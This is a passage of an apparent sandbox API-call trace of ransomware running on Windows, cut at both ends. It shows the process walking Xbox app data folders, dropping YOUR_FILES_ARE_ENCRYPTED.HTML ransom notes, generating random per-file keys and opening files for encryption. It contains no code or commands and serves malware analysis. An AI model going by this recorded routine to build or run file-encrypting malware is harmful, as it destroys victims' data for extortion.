ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x311b070, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 1 [0120.828] StrStrIW (lpFirst="ActivationStore.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.828] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Microsoft.XboxApp_9.9.30030.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.LOG2") returned 170 [0120.828] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0120.828] lstrlenW (lpString=".LOG2") returned 5 [0120.828] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0120.828] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x66315ca, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x66315ca, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x66315ca, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x311b070, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 0 [0120.828] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0120.828] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Microsoft.XboxApp_9.9.30030.0_x64__8wekyb3d8bbwe\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 175 [0120.828] GetProcessHeap () returned 0x600000 [0120.828] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.828] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Microsoft.XboxApp_9.9.30030.0_x64__8wekyb3d8bbwe\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.xboxapp_8wekyb3d8bbwe\\microsoft.xboxapp_9.9.30030.0_x64__8wekyb3d8bbwe\\activationstore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0120.830] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0120.835] CloseHandle (hObject=0x31c) returned 1 [0120.837] GetProcessHeap () returned 0x600000 [0120.837] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.837] GetProcessHeap () returned 0x600000 [0120.837] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.837] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6598ae0, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6598ae0, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x66315ca, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b10a, dwReserved1=0x311b068, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 0 [0120.837] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0120.837] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Microsoft.XboxApp_9.9.30030.0_x64__8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 159 [0120.837] GetProcessHeap () returned 0x600000 [0120.837] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314d018 [0120.837] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Microsoft.XboxApp_9.9.30030.0_x64__8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.xboxapp_8wekyb3d8bbwe\\microsoft.xboxapp_9.9.30030.0_x64__8wekyb3d8bbwe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0120.838] WriteFile (in: hFile=0x324, lpBuffer=0x314d018*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x314d018*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.839] CloseHandle (hObject=0x324) returned 1 [0120.839] GetProcessHeap () returned 0x600000 [0120.839] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314d018 | out: hHeap=0x600000) returned 1 [0120.839] GetProcessHeap () returned 0x600000 [0120.839] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.841] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x60d4016, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x60d4016, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x60d4016, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0120.841] StrStrIW (lpFirst="RoamingState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.841] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\RoamingState") returned 93 [0120.841] GetProcessHeap () returned 0x600000 [0120.841] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.842] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\RoamingState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\RoamingState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\RoamingState" [0120.842] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\RoamingState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\RoamingState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\RoamingState\\*" [0120.842] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\RoamingState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x60d4016, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x60d4016, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x60d4016, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b10a, dwReserved1=0x311b068, cFileName=".", cAlternateFileName="")) returned 0x626838 [0120.842] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x60d4016, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x60d4016, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x60d4016, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b10a, dwReserved1=0x311b068, cFileName="..", cAlternateFileName="")) returned 1 [0120.842] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x60d4016, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x60d4016, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x60d4016, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b10a, dwReserved1=0x311b068, cFileName="..", cAlternateFileName="")) returned 0 [0120.842] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0120.842] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 123 [0120.842] GetProcessHeap () returned 0x600000 [0120.842] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314d018 [0120.843] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.xboxapp_8wekyb3d8bbwe\\roamingstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0120.844] WriteFile (in: hFile=0x324, lpBuffer=0x314d018*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x314d018*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.845] CloseHandle (hObject=0x324) returned 1 [0120.845] GetProcessHeap () returned 0x600000 [0120.845] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314d018 | out: hHeap=0x600000) returned 1 [0120.845] GetProcessHeap () returned 0x600000 [0120.845] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.846] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x60fa254, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x60fa254, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xe640666, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Settings", cAlternateFileName="")) returned 1 [0120.846] StrStrIW (lpFirst="Settings", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.846] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Settings") returned 89 [0120.846] GetProcessHeap () returned 0x600000 [0120.846] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.847] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Settings" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Settings") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Settings" [0120.847] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Settings\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Settings\\*" [0120.847] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Settings\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x60fa254, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x60fa254, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xe640666, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b10a, dwReserved1=0x311b068, cFileName=".", cAlternateFileName="")) returned 0x626778 [0120.848] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x60fa254, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x60fa254, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xe640666, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b10a, dwReserved1=0x311b068, cFileName="..", cAlternateFileName="")) returned 1 [0120.848] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60fa254, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x60fa254, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x60fa254, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b10a, dwReserved1=0x311b068, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0120.848] StrStrIW (lpFirst="roaming.lock", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.848] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Settings\\roaming.lock") returned 102 [0120.848] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0120.848] lstrlenW (lpString=".lock") returned 5 [0120.848] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0120.849] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60fa254, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1cef5ca8, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1cef5ca8, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x311b10a, dwReserved1=0x311b068, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0120.849] StrStrIW (lpFirst="settings.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.849] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Settings\\settings.dat") returned 102 [0120.849] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0120.849] lstrlenW (lpString=".dat") returned 4 [0120.849] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0120.849] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0120.849] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.xboxapp_8wekyb3d8bbwe\\settings\\settings.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x320 [0120.849] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=8192) returned 1 [0120.849] GetProcessHeap () returned 0x600000 [0120.849] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0120.852] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="5A") returned 2 [0120.852] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="7C") returned 2 [0120.852] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="3B") returned 2 [0120.852] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="78") returned 2 [0120.852] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="87") returned 2 [0120.852] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="30") returned 2 [0120.852] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="95") returned 2 [0120.852] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="AD") returned 2 [0120.852] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="59") returned 2 [0120.852] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="F8") returned 2 [0120.852] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="5F") returned 2 [0120.852] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="3D") returned 2 [0120.852] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="F1") returned 2 [0120.852] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="7A") returned 2 [0120.852] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="8B") returned 2 [0120.852] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="35") returned 2 [0120.852] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="E7") returned 2 [0120.852] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="3C") returned 2 [0120.852] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="E1") returned 2 [0120.852] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="23") returned 2 [0120.852] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="EE") returned 2 [0120.852] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="AF") returned 2 [0120.852] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="FF") returned 2 [0120.852] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="0F") returned 2 [0120.852] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="F8") returned 2 [0120.852] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="F4") returned 2 [0120.852] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="8F") returned 2 [0120.852] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="29") returned 2 [0120.853] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="AE") returned 2 [0120.853] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="77") returned 2 [0120.853] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="9A") returned 2 [0120.853] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="47") returned 2 [0120.853] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Settings\\settings.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Settings\\settings.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Settings\\settings.dat" [0120.853] CreateIoCompletionPort (FileHandle=0x320, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0120.853] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0120.853] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xe61a652, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xe61a652, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xe61a652, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x311b10a, dwReserved1=0x311b068, cFileName="settings.dat.LOG1", cAlternateFileName="SETTIN~1.LOG")) returned 1 [0120.853] StrStrIW (lpFirst="settings.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.853] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1") returned 107 [0120.853] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0120.853] lstrlenW (lpString=".LOG1") returned 5 [0120.853] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0120.853] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xe61a652, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xe61a652, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xe61a652, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b10a, dwReserved1=0x311b068, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 1 [0120.854] StrStrIW (lpFirst="settings.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.854] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Settings\\settings.dat.LOG2") returned 107 [0120.854] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0120.854] lstrlenW (lpString=".LOG2") returned 5 [0120.854] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0120.854] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xe61a652, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xe61a652, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xe61a652, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b10a, dwReserved1=0x311b068, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 0 [0120.854] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0120.854] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 119 [0120.854] GetProcessHeap () returned 0x600000 [0120.854] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314d018 [0120.854] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.xboxapp_8wekyb3d8bbwe\\settings\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0120.855] WriteFile (in: hFile=0x324, lpBuffer=0x314d018*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x314d018*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.856] CloseHandle (hObject=0x324) returned 1 [0120.856] GetProcessHeap () returned 0x600000 [0120.856] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314d018 | out: hHeap=0x600000) returned 1 [0120.856] GetProcessHeap () returned 0x600000 [0120.856] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.856] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x60fa254, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x60fa254, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x60fa254, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0120.856] StrStrIW (lpFirst="SystemAppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.856] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.XboxApp_8wekyb3d8bbwe\\SystemAppData") returned 94 [0120.856] GetProcessHeap () returned 0x600000 [0120.856] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 